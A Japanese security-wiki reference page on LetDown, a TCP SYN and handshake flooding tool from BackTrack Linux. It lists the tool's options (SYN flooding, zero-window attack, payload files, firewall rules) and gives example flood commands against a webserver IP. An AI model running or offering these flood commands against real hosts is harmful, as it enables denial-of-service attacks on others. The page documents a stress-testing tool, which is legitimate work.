LetDown

提供: セキュリティ
移動: 案内検索
スポンサーリンク

LetDown とは、TCP SYN パケットをターゲットのIPアドレスのポートに送信する攻撃ツールです。

読み方

LetDown
れっと だうん

概要

LetDown とは、TCP SYN パケットをターゲットのIPアドレスのポートに送信する攻撃ツールです。

インストール

BackTrack Linux では、 /pentest/stressing/letdown にあります。

 

使い方

$ ./letdown
 
LetDown 3wh+payload flooder v0.7.7.2 - Acri Emanuele (crossbower@gmail.com)
Usage:
  letdown -d dst_ip -p dst_port -D dst_mac  [options]
Options:
  -d    destination ip address, target
  -D    destination mac address or router mac address
  -p    destination port
  -s    source ip address
  -S    source mac address
  -x    first source port (default 1025)
  -y    last source port (default 65534)
  -l    enables infinite loop mode
  -i    network interface
  -t    sleep time in microseconds (default 10000)
  -a    max time in second for waiting responses
Extra options:
  -v    verbosity level (0=quiet, 1=normal, 2=verbose)
  -f    automagically set firewall rules for blocking
        rst packet generated by the kernel
        examples: -f iptables, -f blackhole (for freebsd)
  -L    special interaction levels with the target
        s  syn flooding, no 3-way-handshake
        a  send acknowledgment packets (polite mode)
        f  send finalize packets (include polite mode)
        r  send reset packets (check firewall rules...)
  -W    window size for ack packets (ex: 0-window attack)
  -O    enable ack fragmentation and set fragment offset delta
  -C    fragment counter if fragmentation is enabled (default 1)
  -P    payload file (see payloads directory...)
  -M    multistage payload file (see payloads directory...)

一般的な攻撃

# letdown -d 208.xx.xx.xx -s 192.168.1.x -D destination/router_mac -p 21

Webサーバーに対して、ペイロードとファイアーウォールオプションを使った、攻撃。 Attack against a webserver using payload and firewall options:

# letdown -d 208.xx.xx.xx -s 192.168.1.x -D destination/router_mac -p 80 -f iptables -P payloads/http.txt

1024未満の3つのポートに対する接続とタイムオプション。

# letdown -d 208.xx.xx.xx -s 192.168.1.x -D destination/router_mac -p 80 -x 80 -y 100 -t 10000

関連項目




スポンサーリンク